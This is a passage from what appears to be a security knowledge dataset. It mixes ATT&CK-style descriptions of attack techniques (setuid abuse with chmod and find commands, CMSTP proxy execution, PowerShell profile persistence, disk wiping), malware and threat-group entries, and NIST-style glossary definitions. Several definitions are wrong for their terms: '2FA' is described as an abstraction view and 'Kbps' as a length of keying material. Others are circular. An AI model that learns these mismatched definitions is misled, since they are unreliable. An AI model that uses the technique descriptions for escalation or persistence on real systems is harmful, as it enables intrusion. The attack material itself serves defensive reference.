Other techniques such as Dynamic Linker Hijacking may be used to populate a target process with more available gadgets. Similar to Process Hollowing, proc memory injection may target child processes (such as a backgrounded copy of sleep). 

Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via proc memory injection may also evade detection from security products since the execution is masked under a legitimate process.

Term: Integrity authentication
Definition: The process of providing assurance that data has not been modified since an authentication code was created for that data.

Term: CI
Definition: Systems and assets, whether physical or virtual, so vital to the United States that the incapacity or destruction of such systems and assets would have a debilitating impact on cybersecurity, national economic security, national public health or safety, or any combination of those matters.

Name: Automated Collection
Type: attack-pattern
Description: Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a Command and Scripting Interpreter to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. 

In cloud-based environments, adversaries may also use cloud APIs, data pipelines, command line interfaces, or extract, transform, and load (ETL) services to automatically collect data. 

This functionality could also be built into remote access tools. 

This technique may incorporate use of other techniques such as File and Directory Discovery and Lateral Tool Transfer to identify and move files, as well as Cloud Service Dashboard and Cloud Storage Object Discovery to identify resources in cloud environments.

Term: classified national security information
Definition: Information that has been determined pursuant to Executive Order (E.O.) 13526 or any predecessor order to require protection against unauthorized disclosure and is marked to indicate its classified status when in documentary form.

Term: aspect
Definition: The subject or topic of an assessment element that is associated with a portion of the ISCM program under assessment.

Term: Security Configuration Management (SecCM)
Definition: The management and control of configurations for an information system to enable security and facilitate the management of risk.

Term: Replace
Definition: The process of installing a new certificate and removing an existing one so that the new certificate is used in place of the existing certificate on all systems where the existing certificate is being used.

Name: Modify System Image
Type: attack-pattern
Description: Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.

To change the operating system, the adversary typically only needs to affect this one file, replacing or modifying it. This can either be done live in memory during system runtime for immediate effect, or in storage to implement the change on the next boot of the network device.

Name: PowerStallion
Type: malware
Description: PowerStallion is a lightweight PowerShell backdoor used by Turla, possibly as a recovery access tool to install other backdoors.

Term: IoT Product Component
Definition: Equipment (i.e., hardware and software) other than the primary device that can be hosted remotely, locally, or on other equipment (e.g., a mobile app on the customer’s smartphone) that supports the IoT device in its functionality.

Term: Ephemeral Key
Definition: A cryptographic key that is generated for each execution of a cryptographic process (e.g., key establishment) and meets other requirements of the key type (e.g., unique to each message or session).

Term: segment
Definition: In the CFB mode, a sequence of bits whose length is a parameter that does not exceed the block size.

Term: <em>n</em>
Definition: The number of iterations of the PRF needed to generate <i>L</i> bits of keying material.

Term: Uniform Resource Locator
Definition: A reference to a web resource that specifies its location on a computer network and a mechanism for retrieving it. A typical URL could have the form http://www.example.com/index.html, which indicates a protocol (hypertext transfer protocol [http]), a host name (www.example.com), and a file name (index.html). Also sometimes referred to as a web address.

Term: negative risk
Definition: Any circumstance or event with the potential to adversely impact organizational operations, organizational assets, individuals, other organizations, or the Nation through a system via unauthorized access, destruction, disclosure, modification of information, and/or denial of service.

Term: Signature validation
Definition: The (mathematical) verification of the digital signature and obtaining the appropriate assurances (e.g., public key validity, private key possession, etc.).

Term: security authorization (to operate)
Definition: The official management decision given by a senior organizational official to authorize operation of an information system and to explicitly accept the risk to organizational operations (including mission, functions, image, or reputation), organizational assets, individuals, other organizations, and the Nation based on the implementation of an agreed-upon set of security controls and privacy controls.

Term: NVD
Definition: The U.S. government repository of standards based vulnerability management data represented using the Security Content Automation Protocol (SCAP). This data informs automation of vulnerability management, security measurement, and compliance. NVD includes databases of security checklists, security related software flaws, misconfigurations, product names, and impact metrics.

Term: malware
Definition: A program that is covertly inserted into another program with the intent to destroy data, run destructive or intrusive programs, or otherwise compromise the confidentiality, integrity, or availability of the victim’s data, applications, or operating system.

Term: graph neural network
Definition: A neural network designed to process graph-structured data. GNNs perform optimizable transformations on graph attributes (e.g., nodes, edges, global context) while preserving graph symmetries such as permutation invariance. GNNs utilize a “graph-in, graph-out” architecture that takes an input graph with informa­tion and progressively transforms it into an output graph with the same connec­tivity as that of the input graph.

Term: Random Field
Definition: In the RBG-based construction of IVs, either a direct random string or one of its successors.

Term: hash function
Definition: A function that maps a bit string of arbitrary length to a fixed length bit string. Approved hash functions satisfy the following properties: 
1. (One-way) It is computationally infeasible to find any input that maps to any pre-specified output, and 
2. (Collision resistant) It is computationally infeasible to find any two distinct inputs that map to the same output.

Term: DES
Definition: Data Encryption Standard specified in FIPS 46-3

Name: Setuid and Setgid
Type: attack-pattern
Description: An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively. Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.

Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications (i.e. Linux and Mac Permissions). The <code>chmod</code> command can set these bits with bitmasking, <code>chmod 4777 [file]</code> or via shorthand naming, <code>chmod u+s [file]</code>. This will enable the setuid bit. To enable the setgid bit, <code>chmod 2775</code> and <code>chmod g+s</code> can be used.

Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future. This abuse is often part of a "shell escape" or other actions to bypass an execution environment with restricted permissions.

Alternatively, adversaries may choose to find and target vulnerable binaries with the setuid or setgid bits already enabled (i.e. File and Directory Discovery). The setuid and setguid bits are indicated with an "s" instead of an "x" when viewing a file's attributes via <code>ls -l</code>. The <code>find</code> command can also be used to search for such files. For example, <code>find / -perm +4000 2>/dev/null</code> can be used to find files with setuid set and <code>find / -perm +2000 2>/dev/null</code> may be used for setgid. Binaries that have these bits set may then be abused by adversaries.

Term: cryptographic key
Definition: A parameter used in conjunction with a cryptographic algorithm that determines its operation. Examples applicable to this Recommendation include: 1. The computation of a digital signature from data, and 2. The verification of a digital signature.

Term: external network
Definition: A network not controlled by the organization.

Term: system user
Definition: An individual or (system) process acting on behalf of an individual that is authorized to access a system.

Term: key agreement
Definition: A (pair-wise) key-establishment procedure where secret keying material is generated from information contributed by two participants so that no party can predetermine the value of the secret keying material independently from the contributions of the other party. Contrast with key-transport.

Term: security control
Definition: Safeguards or countermeasures prescribed for an information system or an organization to protect the confidentiality, integrity, and availability of the system and its information.

Term: Event Correlation
Definition: Finding relationships between two or more log entries.

Term: exclusive-OR
Definition: The bitwise addition, modulo 2, of two bit strings of equal length.

Term: Reader Spoofing
Definition: The act of impersonating a legitimate reader of an RFID system to read tags.

Term: matching agreement
Definition: A written agreement between a recipient agency and a source agency (or a non-Federal agency) that is required by the Privacy Act for parties engaging in a matching program.

Term: identity verification
Definition: Confirmation, through the provision of objective evidence, that specified requirements have been fulfilled (e.g., an entity’s requirements have been correctly defined, or an entity’s attributes have been correctly presented; or a procedure or function performs as intended and leads to the expected outcome).

Term: 2FA
Definition: View of an object that focuses on the information relevant to a particular purpose and ignores the remainder of the information.

Term: crypto agility for a communication protocol
Definition: The ability to maintain interoperability when introducing new cryptographic algorithms and preventing the use of vulnerable algorithms.

Term: Virtual Local Area Network
Definition: A broadcast domain that is partitioned and isolated within a network at the data link layer. A single physical local area network (LAN) can be logically partitioned into multiple, independent VLANs; a group of devices on one or more physical LANs can be configured to communicate within the same VLAN as if they were attached to the same physical LAN.

Term: Resource Public Key Infrastructure
Definition: The Resource Public Key Infrastructure is a framework aimed to secure the Internet’s routing infrastructure, in particular the routing information such as the IP address prefix and Originator mapping embedded in the BGP protocol. It provides certificates that are used to verify if the originating AS is permitted to publish the embedded IP address prefix(es).

Term: Hash Message Authentication Code
Definition: Keyed-Hash Message Authentication Code specified in [FIPS198].

Term: insider threat program
Definition: A coordinated group of capabilities under centralized management that is organized to detect and prevent the unauthorized disclosure of sensitive information. At a minimum, for departments and agencies that handle classified information, an insider threat program shall consist of capabilities that provide access to information; centralized information integration, analysis, and response; employee insider threat awareness training; and the monitoring of user activity on government computers. For department and agencies that do not handle classified information, these can be employed effectively for safeguarding information that is unclassified but sensitive.

Term: time-compliance date
Definition: Date by which a mandatory modification to a COMSEC end-item must be incorporated if the item is to remain approved for operational use.

Term: Key derivation
Definition: The process by which keying material is derived from either a pre-shared key or a shared secret (from a key-agreement scheme), along with other information.

Term: message digest
Definition: The result of applying a hash function to information; also called a message digest.

Term: architecture
Definition: A set of physical and logical security-relevant representations (i.e., views) of system architecture that conveys information about how the system is partitioned into security domains and makes use of security-relevant elements to enforce security policies within and between security domains based on how data and information must be protected.

Term: specification
Definition: An assessment object that includes document-based artifacts (e.g., policies, procedures, plans, system security requirements, functional specifications, architectural designs) associated with an information system.

Term: privacy control
Definition: The administrative, technical, and physical safeguards employed within an agency to ensure compliance with applicable privacy requirements and manage privacy risks.
Note: Controls can be selected to achieve multiple objectives; those controls that are selected to achieve both security and privacy objectives require a degree of collaboration between the organization’s information security program and privacy program.

Term: security categorization
Definition: The process of determining the security category for information or an information system. Security categorization methodologies are described in Committee on National Security Systems (CNSS) Instruction 1253 for national security systems and in FIPS 199 for other than national security systems.

Term: information system component inventory
Definition: A descriptive record of components within an information system.

Term: attribute
Definition: A property or characteristic of a computing product. CPE 2.2 commonly used the term “component” instead of “attribute”. CPE 2.3 uses the term “attribute” to clarify the distinction between CPE:2.2 name “components” and computing components, such as software modules. Examples of CPE:2.3 attributes are part, vendor, product, and version. CPE attributes and their value constraints are defined in the CPE Naming specification [CPE23-N:5.2, 5.3].

Term: bit string
Definition: An ordered sequence of bits (represented as 0s and 1s). Unless otherwise stated in this document, bit strings are depicted as beginning with their most significant bit (shown in the leftmost position) and ending with their least significant bit (shown in the rightmost position). For example, the most significant (leftmost) bit of 0101 is 0, and its least significant (rightmost) bit is 1. If interpreted as the 4-bit binary representation of an unsigned integer, 0101 corresponds to the number five.

Name: TeamTNT
Type: intrusion-set
Description: TeamTNT is a threat group that has primarily targeted cloud and containerized environments. The group as been active since at least October 2019 and has mainly focused its efforts on leveraging cloud and container resources to deploy cryptocurrency miners in victim environments.

Term: multi-factor authentication
Definition: Authentication using two or more different factors to achieve authentication. Factors include something you know (e.g., PIN, password); something you have (e.g., cryptographic identification device, token); or something you are (e.g., biometric). See also Authenticator.

Term: Cryptographic Accelerator
Definition: A specialized separate coprocessor chip from the main processing unit where cryptographic tasks are offloaded to for performance benefits.

Term: application
Definition: A hardware/software system implemented to satisfy a particular set of requirements. In this context, an application incorporates a system used to satisfy a subset of requirements related to the verification or identification of an end user’s <i>identity</i> so that the end user’s <i>identifier</i> can be used to facilitate the end user’s interaction with the system.

Term: encrypted key
Definition: A cryptographic key that has been encrypted using an Approved security function with a key encrypting key in order to disguise the value of the underlying plaintext key.

Term: IT System
Definition: A combination of interacting elements organized to achieve one or more stated purposes.

Term: ZKP
Definition: A cryptographic scheme where a prover is able to convince a verifier that a statement is true, without providing any more information than that single bit (that is, that the statement is true rather than false).

Term: Diffie Hellman (algorithm)
Definition: The (non-cofactor) FFC Diffie-Hellman key-agreement primitive.

Term: Data Encryption Algorithm
Definition: The DEA cryptographic engine that is used by the Triple Data Encryption Algorithm (TDEA).

Term: security control and privacy control
Definition: Purposeful action on or within a process to meet specified objectives.

Term: cyclic redundancy check (CRC)
Definition: A type of checksum algorithm that is not a cryptographic hash but is used to implement data integrity service where accidental changes to data are expected.

Term: audit trail
Definition: A chronological record that reconstructs and examines the sequence of activities surrounding or leading to a specific operation, procedure, or event in a security-relevant transaction from inception to result.

Term: Federal Cryptographic Key Management System
Definition: Federal Cryptographic Key Management System. A CKMS that conforms to the requirements of SP 800-152.

Term: applicant
Definition: An entity (organization or individual) that  requests the assignment of a name from a Registration Authority.

Term: privacy control baseline
Definition: The set of privacy controls selected based on the privacy selection criteria that provide a starting point for the tailoring process.

Term: Key wrapping
Definition: Encrypting a symmetric key using another symmetric key (the key encrypting key). A key used for key wrapping is known as a key encrypting key.

Term: transmission
Definition: The state that exists when information is being electronically sent from one location to one or more other locations.

Term: Capability, Trust Management
Definition: See Capability, Trust Management.

Name: CMSTP
Type: attack-pattern
Description: Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.

Adversaries may supply CMSTP.exe with INF files infected with malicious commands. Similar to Regsvr32 / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs and/or COM scriptlets (SCT) from remote servers. This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate binary that may be signed by Microsoft.

CMSTP.exe can also be abused to Bypass User Account Control and execute arbitrary commands from a malicious INF through an auto-elevated COM interface.

Term: asset identification
Definition: SCAP constructs to uniquely identify assets (components) based on known identifiers and/or known information about the assets.

Term: full-entropy bitstring
Definition: A bitstring with ideal randomness (i.e., the amount of entropy per bit is equal to 1). This publication proves that a bitstring satisfying a certain definition of <em>full entropy</em> has an entropy rate of at least&nbsp;<span class="math-tex">\(1-ε\)</span>, where&nbsp;<span class="math-tex">\(ε\)</span>&nbsp;is at most&nbsp;<span class="math-tex">\(2^{-32}\)</span>.

Term: RA
Definition: A systematic examination of risk using disciplined processes, methods, and tools. A risk assessment provides an environment for decision makers to evaluate and prioritize risks continuously and to recommend strategies to remediate or mitigate those risks.

Name: PowerShell Profile
Type: attack-pattern
Description: Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. A PowerShell profile (<code>profile.ps1</code>) is a script that runs when PowerShell starts and can be used as a logon script to customize user environments.

PowerShell supports several profiles depending on the user or host program. For example, there can be different profiles for PowerShell host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. 

Adversaries may modify these profiles to include arbitrary commands, functions, modules, and/or PowerShell drives to gain persistence. Every time a user opens a PowerShell session the modified script will be executed unless the <code>-NoProfile</code> flag is used when it is launched. 

An adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator.

Term: DE
Definition: Develop and implement the appropriate activities to identify the occurrence of a cybersecurity event.

Term: FNMR
Definition: False Non-Match Rate (defined over single comparisons)

Name: TFTP Boot
Type: attack-pattern
Description: Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.

Adversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with Modify System Image to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to ROMMONkit and may result in the network device running a modified image.

Term: trust model
Definition: A collection of assumptions that characterize the trustworthiness of each component in a system.

Term: defense-in-depth
Definition: Information security strategy integrating people, technology, and operations capabilities to establish variable barriers across multiple layers and dimensions of the organization.

Term: cross domain solution (CDS) filtering
Definition: The process of inspecting data as it traverses a cross domain solution and determining if the data meets pre-defined policy.

Term: misconfiguration
Definition: A setting within a computer program that violates a configuration policy or that permits or causes unintended behavior that impacts the security posture of a system. CCE can be used for enumerating misconfigurations.
NOTE: NIST generally defines vulnerability as including both software flaws and configuration issues [misconfigurations]. For the purposes of the validation program and dependent procurement language, the SCAP Validation program is defining vulnerability and misconfiguration as two separate entities, with “vulnerability” referring strictly to software flaws.

Term: stability
Definition: An inherent characteristic of an oscillator that determines how well it can produce the same frequency over a given time interval. Stability does not indicate whether the frequency is right or wrong, but only whether it stays the same. The stability of an oscillator does not necessarily change when the frequency offset changes. An oscillator can be adjusted, and its frequency moved either further away from or closer to its nominal frequency without changing its stability at all.
The stability of an oscillator is usually specified by a statistic, such as the Allan deviation, that estimates the frequency fluctuations of the device over a given time interval. Some devices, such as an OCXO [Oven Controlled Crystal (Xtal) Oscillator] have good short-term stability and poor long-term stability. Other devices, such as a GPS disciplined oscillator (GPSDO), typically have poor short-term stability and good long-term stability.

Term: Kbps
Definition: Length in bits of the keying material.

Term: Trusted Third Party
Definition: A third party, such as a CA, that is trusted by its clients to perform certain services. (By contrast, in a key establishment transaction, the participants, parties U and V, are considered to be the first and second parties.)

Name: Chinoxy
Type: malware
Description: Chinoxy is a backdoor that has been used since at least November 2018, during the FunnyDream campaign, to gain persistence and drop additional payloads. According to security researchers, Chinoxy has been used by Chinese-speaking threat actors.

Name: ROAMINGHOUSE
Type: malware
Description: ROAMINGHOUSE is a dropper malware used by MirrorFace to extract and execute embedded payloads including UPPERCUT components.

Name: Linux Rabbit
Type: malware
Description: Linux Rabbit is malware that targeted Linux servers and IoT devices in a campaign lasting from August to October 2018. It shares code with another strain of malware known as Rabbot. The goal of the campaign was to install cryptocurrency miners onto the targeted servers and devices.

Term: Cyber Threat
Definition: Any circumstance or event with the potential to adversely impact organizational operations and assets, individuals, other organizations, or the Nation through an information system via unauthorized access, destruction, disclosure, or modification of information, and/or denial of service.

Term: Certificate Authority (CA)
Definition: A trusted entity that issues and revokes public key certificates.

Term: Data Collector
Definition: A person who records information about actions that occur during an exercise or test.

Term: RA
Definition: An entity authorized by the certification authority system (CAS) to collect, verify, and submit information provided by potential subscribers, which is to be entered into public key certificates. The term RA refers to hardware, software, and individuals that collectively perform this function.

Name: Data Transfer Size Limits
Type: attack-pattern
Description: An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.

Name: Disk Wipe
Type: attack-pattern
Description: Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.

To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks may have worm-like features to propagate across a network by leveraging additional techniques like Valid Accounts, OS Credential Dumping, and SMB/Windows Admin Shares.

On network devices, adversaries may wipe configuration files and other data from the device using Network Device CLI commands such as `erase`.

Term: Latency
Definition: time delay in processing voice packets.

Term: biometric reference
Definition: One or more stored biometric samples, templates, or models attributed to an individual and used as the object of biometric comparison in a database, such as a facial image stored digitally on a passport, fingerprint minutiae template on a National ID card, or Gaussian Mixture Model for speaker recognition.

Term: System Integrator
Definition: Those organizations that provide customized services to the acquirer including for example, custom development, test, operations, and maintenance.

Term: TEMPEST certified equipment or system
Definition: Equipment or systems that have been certified to meet the applicable level of NSTISSAM TEMPEST/1-92 or previous editions. Typically categorized as Level 1 for the highest containment of classified signals; Level II for the moderate containment of classified signals; and Level III for the least containment of classified signals.

Term: Service Composition
Definition: Aggregation of multiple small services into larger services.

Term: Block Cipher Algorithm
Definition: A family of functions and their inverse functions that is parameterized by cryptographic keys; the functions map bit strings of a fixed length to bit strings of the same length.

Term: CAPI
Definition: An application programming interface included with Microsoft Windows operating systems that provides services to enable developers to secure Windows-based applications using cryptography. While providing a consistent API for applications, API allows for specialized cryptographic modules (cryptographic service providers) to be provided by third parties, such as hardware security module (HSM) manufacturers. This enables applications to leverage the additional security of HSMs while using the same APIs they use to access built-in Windows cryptographic service providers. (Also known variously as CryptoAPI, Microsoft Cryptography API, MS-CAPI or simply CAPI)

Name: P2P ZeuS
Type: malware
Description: P2P ZeuS is a closed-source fork of the leaked version of the ZeuS botnet. It presents improvements over the leaked version, including a peer-to-peer architecture.

Name: Forfiles
Type: tool
Description: Forfiles is a Windows utility commonly used in batch jobs to execute commands on one or more selected files or directories (ex: list all directories in a drive, read the first line of all files created yesterday, etc.). Forfiles can be executed from either the command line, Run window, or batch files/scripts.

Name: JSS Loader
Type: malware
Description: JSS Loader is Remote Access Trojan (RAT) with .NET and C++ variants that has been used by FIN7 since at least 2020.

Term: Free Space
Definition: An area on media or within memory that is not allocated.

Term: Visibility
Definition: Amount of information that can be gathered about a supplier, product, or service and how far through the supply chain this information can be obtained.

Term: Session
Definition: A persistent interaction between a subscriber and an endpoint, either an RP or a CSP. A session begins with an authentication event and ends with a session termination event. A session is bound by use of a session secret that the subscriber’s software (a browser, application, or OS) can present to the RP or CSP in lieu of the subscriber’s authentication credentials.

Term: SCAP Content Checklist
Definition: An automated checklist that adheres to the SCAP specification in NIST SP 800-126 for documenting security settings in machine-readable standardized SCAP formats.

Term: ACM
Definition: Implementations of formal AC policy such as AC model. Access control mechanisms can be designed to adhere to the properties of the model by machine implementation using protocols, architecture, or formal languages such as program code.

Term: Double spend (problem)
Definition: Transacting with the same set of digital assets more than once. This is a problem which has plagued many digital money systems, and a problem that most blockchain networks are designed to prevent.

Term: Log Archival
Definition: Retaining logs for an extended period of time, typically on removable media, a storage area network (SAN), or a specialized log archival appliance or server.

Term: Conformity Assessment
Definition: Demonstration that specified requirements are fulfilled.

Term: cybersecurity framework core
Definition: A set of cybersecurity activities and references that are common across critical infrastructure sectors and are organized around particular outcomes. The Framework Core comprises four types of elements: Functions, Categories, Subcategories, and Informative References.

Term: Transponder
Definition: See Tag

Name: KEYPLUG
Type: malware
Description: KEYPLUG is a modular backdoor written in C++, with Windows and Linux variants, that has been used by APT41 since at least June 2021.

Term: adverse consequence
Definition: An undesirable consequence associated with a loss.

Term: DT
Definition: The virtual (i.e., digital) representation of a physical or perceived real-world entity, concept, or notion.

Term: BGP Secure Routing Extension
Definition: BGP Secure Routing Extension consisting of multiple software modules that implement Route Origin Validation as well as BGPsec Path Validation.

Name: Elevated Execution with Prompt
Type: attack-pattern
Description: Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code> API to escalate privileges by prompting the user for credentials. The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified. 

Although this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.

Adversaries may abuse <code>AuthorizationExecuteWithPrivileges</code> to obtain root privileges in order to install malicious software on victims and install persistence mechanisms. This technique may be combined with Masquerading to trick the user into granting escalated privileges to malicious code. This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.

Term: enabling system
Definition: System that supports a system-of-interest during its life cycle stages but does not necessarily contribute directly to its function during operation.

Term: Entropy
Definition: A measure of the disorder, randomness or variability in a closed system. Min-entropy is the measure used in this Recommendation.

Name: BADHATCH
Type: malware
Description: BADHATCH is a backdoor that has been utilized by FIN8 since at least 2019. BADHATCH has been used to target the insurance, retail, technology, and chemical industries in the United States, Canada, South Africa, Panama, and Italy.

Term: central management
Definition: The organization-wide management and implementation of selected security and privacy controls and related processes. Central management includes planning, implementing, assessing, authorizing, and monitoring the organization-defined, centrally managed security and privacy controls and processes.

Name: AuditCred
Type: malware
Description: AuditCred is a malicious DLL that has been used by Lazarus Group during their 2018 attacks.

Term: Biometric Verification
Definition: Automated process of confirming a biometric claim through biometric comparison.

Term: certificate revocation list (CRL)
Definition: a list of revoked but unexpired certificates issued by a CA.

Term: Lock Pointer
Definition: A memory pointer that points to a target area of memory and write protects all memory locations less than the target location. This form of access control is implemented in ISO/IEC 18000-3.

Term: biometric sample
Definition: An analog or digital representation of biometric characteristics prior to biometric feature extraction, such as a record that contains a fingerprint image.

Term: key establishment
Definition: The process that results in the sharing of a key between two or more entities, either by manual distribution, using automated key transport or key agreement mechanisms or by using key derivation that employs an already-shared key between or among those entities. Key establishment may include the creation of a key.

Term: <strong>Should</strong>
Definition: The term used to indicate an important recommendation. Ignoring the recommendation could result in undesirable results. Note that should may be coupled with not to become should not.

Term: Pivoting
Definition: A process where an attacker uses one compromised system to move to another system within an organization.

Name: CanisterWorm
Type: malware
Description: CanisterWorm is a self-propagating malware that has been used by TeamPCP in credential harvesting and software supply chain campaigns since at least 2026. CanisterWorm has used npm credentials to infect software packages and propagate across developer ecosystems. CanisterWorm has a targeted wiper component and can use decentralized C2 infrastructure implemented via an Internet Computer Protocol (ICP) blockchain canister.

Term: Communications
Definition: The actions and associated activities that are used to exchange information, provide instructions, give details, etc. In the context of this paper, communications refers to the full range of activities involved with providing information to support the secure use of IoT devices. Communications include using such tools as phone calls, emails, user guides, in-person classes, instruction manuals, webinars, written instructions, videos, quizzes, frequently asked questions (FAQ) documents, and any other type of tool for such information exchanges.

Name: build_downer
Type: malware
Description: build_downer is a downloader that has been used by BRONZE BUTLER since at least 2019.

Term: On-Access Scanning
Definition: Configuring a security tool to perform real-time scans of each file for malware as the file is downloaded, opened, or executed.

Name: User Account Control
Type: course-of-action
Description: User Account Control (UAC) is a security feature in Microsoft Windows that prevents unauthorized changes to the operating system. UAC prompts users to confirm or provide administrator credentials when an action requires elevated privileges. Proper configuration of UAC reduces the risk of privilege escalation attacks. This mitigation can be implemented through the following measures:

Enable UAC Globally:

- Ensure UAC is enabled through Group Policy by setting `User Account Control: Run all administrators in Admin Approval Mode` to `Enabled`.

Require Credential Prompt:

- Use Group Policy to configure UAC to prompt for administrative credentials instead of just confirmation (`User Account Control: Behavior of the elevation prompt`).

Restrict Built-in Administrator Account:

Set `Admin Approval Mode` for the built-in Administrator account to `Enabled` in Group Policy.

Secure the UAC Prompt:

- Configure UAC prompts to display on the secure desktop (`User Account Control: Switch to the secure desktop when prompting for elevation`).

Prevent UAC Bypass:

- Block untrusted applications from triggering UAC prompts by configuring `User Account Control: Only elevate executables that are signed and validated`.
- Use EDR tools to detect and block known UAC bypass techniques.

Monitor UAC-Related Events:

- Use Windows Event Viewer to monitor for event ID 4688 (process creation) and look for suspicious processes attempting to invoke UAC elevation.

*Tools for Implementation*

Built-in Windows Tools:

- Group Policy Editor: Configure UAC settings centrally for enterprise environments.
- Registry Editor: Modify UAC-related settings directly, such as `EnableLUA` and `ConsentPromptBehaviorAdmin`.

Endpoint Security Solutions:

- Microsoft Defender for Endpoint: Detects and blocks UAC bypass techniques.
- Sysmon: Logs process creations and monitors UAC elevation attempts for suspicious activity.

Third-Party Security Tools:

- Process Monitor (Sysinternals): Tracks real-time processes interacting with UAC.
- EventSentry: Monitors Windows Event Logs for UAC-related alerts.

Term: digital signature
Definition: a data unit that allows a recipient of a message to verify the identity of the signatory and integrity of the message.

Term: vulnerability scanner
Definition: A tool (hardware and/or software) used to identify hosts/host attributes and associated vulnerabilities (CVEs, CWEs, and others).

Term: critical infrastructure
Definition: The essential services that support a society and serve as the backbone for the society's economy, security and health.

Term: information system component
Definition: A discrete identifiable IT asset that represents a building block of an information system.

Term: Identity Provider (IdP)
Definition: The party that manages the subscriber’s primary authentication credentials and issues assertions derived from those credentials. This is commonly the CSP as discussed within this document suite.

Term: observational data
Definition: Data captured through the observation of an activity or behavior without the direct involvement of the subject.

Term: Pivot
Definition: The act of an attacker moving from one compromised system to one or more  other systems within the same or other organizations. Pivoting is fundamental to the success of advanced persistent threat (APT) attacks. SSH trust relationships may more readily allow an attacker to pivot.

Term: File
Definition: A collection of information logically grouped into a single entity and referenced by a unique name, such as a filename.

Term: CVE ID
Definition: An identifier for a specific software flaw defined within the official CVE Dictionary and that conforms to the CVE specification.

Term: Active Security Testing
Definition: Security testing that involves direct interaction with a target, such as sending packets to a target.

Term: potentially identifiable personal information
Definition: A new category of information proposed by Robert Gellman for information that has been de-identified but can be potentially re-identified. Potentially identifiable personal information is any personal information without overt identifiers. Under Gellman’s proposal, parties that wish to exchange attempts PI2 could voluntarily subscribe to a regime that would provide for both criminal and civil penalties if the recipient of the data attempted to re-identify the data subjects.

Name: CosmicDuke
Type: malware
Description: CosmicDuke is malware that was used by APT29 from 2010 to 2015.

Term: Registration agent
Definition: An FCKMS role that is responsible for registering new entities and perhaps other selected information.

Term: external coordinator
Definition: Any vulnerability disclosure entity that receives a vulnerability report that is not within the FCB or the VDPO; the EC may be a commercial vulnerability program with no relation to the Government or a separate VDPO within the Government, or it may be the developer of commercial or open-source software.

Name: System Time Discovery
Type: attack-pattern
Description: An adversary may gather the system time and/or time zone settings from a local or remote system. The system time is set and stored by services, such as the Windows Time Service on Windows or <code>systemsetup</code> on macOS. These time settings may also be synchronized between systems and services in an enterprise network, typically accomplished with a network time server within a domain.

System time information may be gathered in a number of ways, such as with Net on Windows by performing <code>net time \\hostname</code> to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using <code>w32tm /tz</code>. In addition, adversaries can discover device uptime through functions such as <code>GetTickCount()</code> to determine how long it has been since the system booted up.

On network devices, Network Device CLI commands such as `show clock detail` can be used to see the current time configuration. On ESXi servers, `esxcli system clock get` can be used for the same purpose.

In addition, system calls – such as <code>time()</code> – have been used to collect the current time on Linux devices. On macOS systems, adversaries may use commands such as <code>systemsetup -gettimezone</code> or <code>timeIntervalSinceNow</code> to gather current time zone information or current date and time.

This information could be useful for performing other techniques, such as executing a file with a Scheduled Task/Job, or to discover locality information based on time zone to assist in victim targeting (i.e. System Location Discovery). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.

Term: <em>MaxErrs</em>
Definition: The maximum number of times that the output of any implementation of the decryption verification process can be INVALID before the key is retired.

Term: control baseline
Definition: See control baseline.

Term: Cybersecurity Incident
Definition: An occurrence that (1) actually or imminently jeopardizes, without lawful authority, the integrity, confidentiality, or availability of information or an information system; or (2) constitutes a violation or imminent threat of violation of law, security policies, security procedures, or acceptable use policies.

Term: Capability, Vulnerability Management
Definition: An ISCM capability that identifies vulnerabilities [Common Vulnerabilities and Exposures (CVEs)] on devices that are likely to be used by attackers to compromise a device and use it as a platform from which to extend compromise to the network.

Name: SUGARDUMP
Type: malware
